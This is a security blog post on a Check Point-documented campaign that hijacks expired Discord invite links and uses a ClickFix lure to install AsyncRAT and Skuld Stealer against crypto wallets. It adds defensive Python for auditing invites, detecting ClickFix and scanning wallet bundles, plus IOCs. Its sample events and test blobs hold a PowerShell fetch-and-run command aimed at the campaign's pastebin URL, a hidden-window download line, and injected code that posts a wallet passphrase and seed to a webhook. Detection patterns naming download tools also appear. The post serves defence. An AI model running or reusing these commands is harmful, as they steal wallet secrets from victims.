How Malware Uses Discord to Take Control and Steal Cryptocurrency Wallets

Lưu Tuấn Anh

Campaign Overview

Recently, security researchers at Check Point documented a dangerous attack campaign on the Discord platform, known as "invite link hijacking", that is used to spread malware. Its ultimate goal is to steal sensitive information, above all users' cryptocurrency wallets. The attackers take over expired or deleted invite codes, so that links still circulating in legitimate communities silently redirect users to malicious servers that deliver spyware and remote access trojans.

This campaign uses two main types of malware:

  • AsyncRAT: an open-source remote access trojan (RAT) with full remote-control capabilities.

  • Skuld Stealer: a Go-based information stealer that targets browsers, cryptocurrency wallets, and login credentials.

According to the analysis by Check Point's researchers, the campaign, which was still active at the time of the report, had affected at least 1,300 users worldwide, with most reports coming from the United States, the United Kingdom, France, the Netherlands, and Germany.

AsyncRAT and Skuld Stealer: Two Dangerous Tools

AsyncRAT:

  • Allows attackers to:

    • Monitor users remotely.

    • Record keystrokes (keylogger).

    • Access webcam and microphone.

    • Upload or download files.

  • Open-source, easy to customize.

Skuld Stealer:

  • Main goal: steal sensitive information.

  • Capabilities:

    • Extract browser-extension wallet data from Chromium-based browsers (Chrome, Edge, Brave…).

    • Retrieve login data, cookies, Discord tokens.

    • Extract files from wallet directories (MetaMask, Exodus, Atomic…).

    • Send stolen information to the C2 server via webhook or TCP.

How Discord Invite Links Work

A Discord invite link is a short URL created to invite others to join a Discord server. It looks like this: https://discord.gg/abc123

When a user opens the link, they:

  • Join the Discord server (if they are not already a member).

  • Get immediate access to the community if the server requires no verification.

The code at the end of the link is the only thing that identifies the server, and it is not bound to that server forever. When a temporary invite expires or the server it pointed to is deleted, the code becomes free again, and a server with a high enough Boost level can register it as its own custom (vanity) invite; this is the loophole Check Point describes. Links posted long ago on websites, forums, and in other communities do not change in any way, yet they now lead to a server the attacker fully controls, where every channel, message, and bot is staged to push the visitor toward running the malware.
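As an added example (not code from this article or from Check Point), the following Python script audits invite links that an organization has published against the server they were meant to reach. It uses Discord's public invite endpoint, GET https://discord.com/api/v10/invites/{code}, which answers without a token for public invites and returns 404 once an invite has expired or its server is gone. The sample responses, guild IDs, and link list are constructed; calling the audit without a fetch function queries Discord for real.

```python
"""Audit published Discord invite links for expiry or takeover.

Added example, not code from the article or from Check Point. Uses the public
endpoint GET https://discord.com/api/v10/invites/{code}, which answers without
a token for public invites and returns 404 once an invite has expired or its
server is gone. SAMPLE_RESPONSES, PUBLISHED_LINKS and the guild IDs are constructed.
"""
import json
import re
import urllib.request
from urllib.error import HTTPError

INVITE_RE = re.compile(
    r"(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)"
)
API = "https://discord.com/api/v10/invites/"


def extract_code(link):
    """Return the invite code from a discord.gg / discord.com/invite link, else None."""
    m = INVITE_RE.search(link)
    return m.group(1) if m else None


def _live_fetch(url):
    # Real lookup; only used when no fetch function is supplied.
    req = urllib.request.Request(url, headers={"User-Agent": "invite-audit/1.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def resolve_invite(code, fetch=None):
    """Return the invite object, or None when Discord answers 404 (expired/deleted)."""
    try:
        return (fetch or _live_fetch)(API + code)
    except HTTPError as err:
        if err.code == 404:
            return None
        raise


def classify(link, expected_guild_id, fetch=None):
    """'ok' if the link still lands on the expected guild, 'dead' if it no longer
    resolves (a code that is free to be re-registered by someone else),
    'hijacked' if it now resolves to a different guild."""
    code = extract_code(link)
    if code is None:
        return "not-an-invite"
    invite = resolve_invite(code, fetch)
    if invite is None:
        return "dead"
    guild_id = str(invite.get("guild", {}).get("id", ""))
    return "ok" if guild_id == str(expected_guild_id) else "hijacked"


def audit(links, fetch=None):
    """links: iterable of (invite_link, expected_guild_id) pairs."""
    return [(link, classify(link, gid, fetch)) for link, gid in links]


# Constructed responses standing in for the API: one live invite, one expired
# code (absent, so 404), and one code that now resolves to a look-alike guild.
SAMPLE_RESPONSES = {
    API + "abc123": {"code": "abc123", "guild": {"id": "111111111111111111", "name": "Project Support"}},
    API + "community": {"code": "community", "guild": {"id": "999999999999999999", "name": "Project Support | Verify"}},
}


def sample_fetch(url):
    body = SAMPLE_RESPONSES.get(url)
    if body is None:
        raise HTTPError(url, 404, "Not Found", {}, None)
    return body


# Constructed list of links "we" published, with the guild each should reach.
PUBLISHED_LINKS = [
    ("https://discord.gg/abc123", "111111111111111111"),
    ("https://discord.gg/oldcode", "111111111111111111"),
    ("https://discord.gg/community", "111111111111111111"),
]

if __name__ == "__main__":
    for link, status in audit(PUBLISHED_LINKS, sample_fetch):
        print(f"{status:9} {link}")
```

A "dead" result is the one to act on first: that code is exactly what an attacker can re-register, so the link should be removed from every page and post where it was published, not just left to fail.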

How Attackers Operate

  1. Initial Intrusion
  • The attackers first spread hijacked invite links, i.e. links that once pointed to legitimate communities but whose codes have since been re-registered, through legitimate groups and websites. When users click such a link, they are unknowingly taken to a malicious Discord server.

  • Inside the malicious server, the user is asked to click a "Verify" button. Clicking it authorizes a bot (an OAuth2 authorization) and redirects the user to https://captchaguard[.]me. Through that authorization the bot obtains the user's profile details, such as username, avatar, and Discord banner; it gains no access to the user's machine.

  • No code runs on the machine just because the button was clicked. The website instead uses the ClickFix technique: it shows a fake verification problem that the user is told to "fix" by opening the Windows Run dialog (Win + R) and pasting a command that the page has already placed on the clipboard. That command downloads and runs a PowerShell script from https://pastebin[.]com/raw/zW0L2z2M.

  • The PowerShell script is clearly built to hide its own window, download an executable (EXE) from GitHub, and run it silently on the victim's system. From here the attacker can stage further payloads (RAT, stealer...).

  • The downloaded Installer.exe fetches its payload from Bitbucket and also drops two malicious VBScript files, which serve to evade security controls, establish persistence, and create and execute configuration files.

  • The next stage downloads Rnr.exe, a second downloader similar to Installer.exe that fetches additional payloads. It performs the following tasks:

    • Decode XOR binary data.

    • Write the payload to AppData.

    • Download malware from Bitbucket.

    • Manipulate vtables (probably for obfuscation or anti-debugging).

    • Run the payload silently through a task or script.
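The ClickFix step in the chain above leaves a recognizable trace in process-creation telemetry: a command pasted into the Run dialog is launched by explorer.exe, and the pasted command hides its PowerShell window and pulls a script from the internet. The following Python is an added example (not code from the article or from Check Point) that scores constructed Sysmon Event ID 1 records for that pattern; the scoring weights are this example's own, not a published detection rule, and the events are constructed to mirror the campaign's pastebin and GitHub downloads.

```python
"""Flag the ClickFix execution pattern in process-creation telemetry.

Added example, not from the article. SAMPLE_EVENTS are constructed Sysmon
Event ID 1 records reduced to the fields the rule needs; the scoring is this
example's own, not a published detection.
"""
import re

# A command pasted into the Run dialog (Win+R) is launched by explorer.exe, so
# the chain explorer.exe -> powershell.exe with a hidden window and an
# outbound download is the footprint of a ClickFix lure. Hosts seen in this
# campaign (pastebin raw, GitHub, Bitbucket) add weight.
PS_IMAGES = ("powershell.exe", "pwsh.exe")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|start-bitstransfer|curl|wget)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
SUSPECT_HOSTS = ("pastebin.com/raw", "raw.githubusercontent.com", "github.com", "bitbucket.org")


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    if _basename(ev.get("Image", "")) not in PS_IMAGES:
        return 0, []
    reasons = []
    cmd = ev.get("CommandLine", "")
    if _basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("PowerShell launched by explorer.exe (Run dialog)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive in command line")
    for url in URL_RE.findall(cmd):
        if any(h in url.lower() for h in SUSPECT_HOSTS):
            reasons.append("payload host: " + url)
    return len(reasons), reasons


def triage(events, threshold=3):
    """Return [(ProcessId, score, reasons)] for events at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.get("ProcessId"), score, reasons))
    return hits


# Constructed events: one pasted ClickFix command from this campaign, two
# benign PowerShell launches, and one hidden-window GitHub download.
SAMPLE_EVENTS = [
    {
        "ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr https://pastebin.com/raw/zW0L2z2M | iex"',
    },
    {   # user simply opened PowerShell from the Start menu
        "ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"',
    },
    {   # scheduled admin script, not interactive
        "ProcessId": 4204, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # loader style: hidden window, DownloadString from GitHub
        "ProcessId": 4260, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "pwsh -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://github.com/example/repo/raw/main/run.ps1')\"",
    },
]

if __name__ == "__main__":
    for pid, score, reasons in triage(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

The parent-process check is what separates a pasted command from a legitimately scheduled or scripted PowerShell run; the same logic can be fed from Windows Security event 4688 if command-line auditing is enabled, and corroborated by the RunMRU registry key, which records what was typed into the Run dialog.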

  2. Deploying Payload
  • During the campaign, the researchers found two payloads, Skuld Stealer and AsyncRAT, deployed on the victim's machine. First, AClient.exe (AsyncRAT) is launched, allowing the attackers to:

    • Execute arbitrary commands and scripts.

    • Perform keylogging and take screenshots.

    • Manage files (upload, download, delete files).

    • Access remote desktop and camera.

All collected data is sent to the malicious C&C server at 101.99.76.120.

  • Next, the second payload, skul.exe (Skuld Stealer), is executed. Its notable capabilities include:

    • Anti-debugging.

    • Detecting virtual machines and evading Sandbox systems.

    • Stealing information from Chrome-based browsers such as logins, cookies, credit cards, and browsing history.

    • Crypto clipper (replacing clipboard content with cryptocurrency addresses controlled by the attacker).

    • Stealing Discord authentication tokens.

    • Tampering with the Discord client to intercept or block sensitive user actions such as logging in, changing passwords, adding payment information, device-view requests, and QR-code logins.

    • Collecting sessions from popular gaming platforms (Epic Games, Minecraft, Riot Games, Uplay).

    • Gathering system information (CPU, GPU, RAM, IP, geolocation, Wi-Fi network).

    • Stealing cryptocurrency wallet data, including seed phrases and passwords.

  • The most dangerous aspect of skul.exe is its attack on the victim's cryptocurrency wallets. It downloads malicious .asar files (the download sources are not reproduced in this post).

  • Once downloaded, these files take the place of the wallet's legitimate application code (Exodus and Atomic are Electron applications whose code ships in app.asar); the downloaded files also create fake wallet licenses and encrypt them. The attacker has prepared a sophisticated Exodus wallet stealer script for this purpose, hiding a Discord webhook inside an otherwise legitimate file. Because the wallets are open source, the attacker could locate the exact code that handles the secrets, so as soon as the user unlocks the wallet, the mnemonic phrase and password are captured and sent to the attacker through the webhook.
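Because the trojanized bundle carries its exfiltration webhook as a plain string, a host-level check is straightforward. The following Python is an added example (not code from the article, from Check Point, or from any wallet vendor) that scans an app.asar for Discord webhook URLs and compares its hash with a value recorded from a clean install. The two sample blobs are constructed stand-ins for wallet code, and the install paths under %LOCALAPPDATA% are assumptions about default Windows installs of Exodus and Atomic.

```python
"""Look for an injected Discord webhook in an Electron wallet's app.asar.

Added example, not code from the article, from Check Point or from any wallet
vendor. CLEAN_SAMPLE/INJECTED_SAMPLE are constructed stand-ins for app.asar,
and the install paths are assumptions about default Windows installs.
"""
import glob
import hashlib
import os
import re

WEBHOOK_RE = re.compile(
    rb"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+")

# Assumed default locations of the Electron bundle for two wallets the stealer targets.
_LOCAL = os.environ.get("LOCALAPPDATA", "")
ASAR_GLOBS = [
    os.path.join(_LOCAL, "exodus", "app-*", "resources", "app.asar"),
    os.path.join(_LOCAL, "Programs", "atomic", "resources", "app.asar"),
]


def find_webhooks(blob):
    """All distinct Discord webhook URLs present as plain strings in blob."""
    return sorted({m.decode("ascii") for m in WEBHOOK_RE.findall(blob)})


def sha256(blob):
    return hashlib.sha256(blob).hexdigest()


def assess(blob, known_good_sha256=None):
    """Verdict for one bundle: 'tampered' if a webhook is embedded or the hash
    differs from the known-good value; 'clean' if the hash matches; 'unverified'
    when no webhook was found but no reference hash was supplied."""
    hooks = find_webhooks(blob)
    digest = sha256(blob)
    if hooks:
        verdict = "tampered"
    elif known_good_sha256 is None:
        verdict = "unverified"
    elif digest != known_good_sha256.lower():
        verdict = "tampered"
    else:
        verdict = "clean"
    return {"sha256": digest, "webhooks": hooks, "verdict": verdict}


def assess_installed(reference_hashes=None):
    """Scan every bundle found at the assumed paths. reference_hashes maps a
    path to the sha256 recorded from a clean install of the same version."""
    reference_hashes = reference_hashes or {}
    results = {}
    for pattern in ASAR_GLOBS:
        for path in glob.glob(pattern):
            with open(path, "rb") as f:
                results[path] = assess(f.read(), reference_hashes.get(path))
    return results


# Constructed stand-ins: a fragment of wallet unlock code, and the same
# fragment with the kind of hook the campaign injects (post the secret, then
# behave normally so the user notices nothing).
CLEAN_SAMPLE = (
    b"module.exports.unlock = async function (passphrase) {\n"
    b"  const mnemonic = await decryptSeed(passphrase);\n"
    b"  return mnemonic;\n};\n"
)
INJECTED_SAMPLE = CLEAN_SAMPLE.replace(
    b"  return mnemonic;\n",
    b"  fetch('https://discord.com/api/webhooks/1234567890/AbCdEf_ghijk-LMN',\n"
    b"    {method:'POST',headers:{'content-type':'application/json'},\n"
    b"     body:JSON.stringify({content:passphrase+' '+mnemonic})});\n"
    b"  return mnemonic;\n",
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE)):
        print(name, assess(blob, sha256(CLEAN_SAMPLE)))
```

The hash comparison matters as much as the string scan: an attacker can obfuscate or split the webhook URL, but cannot change the bundle without changing its digest, so record the clean hash right after installing or updating the wallet and re-check it after any suspicious event.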

Conclusion

This campaign is a typical example of abusing community trust (in Discord) to run a phishing plus multi-stage malware operation against cryptocurrency users. The attacker chained several techniques: hijacked invite links, a fake verification server, ClickFix, and downloading and running malicious PowerShell.

Left undetected, these actions are genuinely dangerous. Solid defensive controls and integrated monitoring are necessary to protect both personal and organizational systems against this growing class of threat.

Recommendations

  1. Block malicious Discord domains and links
  • Block the domains, URLs, and C2 addresses listed in the IOC section at the DNS, proxy, and firewall layers.

  2. Do not trust Discord invites from unknown sources
  • Warn users not to click on Discord invites coming from:

    • Strange emails, spam.

    • Pop-up ads, YouTube channels, download blogs.

  • Enhance user awareness about malware potentially hiding behind seemingly legitimate Discord links.

  3. Limit script execution rights
  • Configure systems to:

    • Prevent standard users from executing .vbs, .ps1, and .js files from user-writable directories such as Downloads and AppData.

    • Use AppLocker or Windows Defender Application Control (WDAC) to control scripts.

  4. Regularly update systems and applications
  • Much malware exploits vulnerabilities in outdated software to execute malicious code or escalate privileges.

  • Maintain a regular update policy for operating systems and browsers.

IOC

  1. Hashes

    • 673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932

    • 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693

    • 5d0509f68a9b7c415a726be75a078180e3f02e59866f193b0a99eee8e39c874f

    • 375fa2e3e936d05131ee71c5a72d1b703e58ec00ae103bbea552c031d3bfbdbe

    • 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe

    • d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1

    • 670be5b8c7fcd6e2920a4929fcaa380b1b0750bfa27336991a483c0c0221236a

    • 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c

    • f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c

    • db1aa52842247fc3e726b339f7f4911491836b0931c322d1d2ab218ac5a4fb08

    • ef8c2f3c36fff5fccad806af47ded1fd53ad3e7ae22673e28e541460ff0db49c

  2. URLs & Domains

PowerShell Script:

Bitbucket repositories:

First stage downloader:

Second stage downloader:

Skuld stealer:

AsyncRAT:

AsyncRat Dead Drop Resolver:

  3. C2

    • 101.99.76.120

    • 87.120.127.37

    • 185.234.247.8

    • microads[.]top

  4. Skuld Discord Webhooks

Reference

  1. The Discord Invite Loophole Hijacked for Attacks - Check Point Research

  2. Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
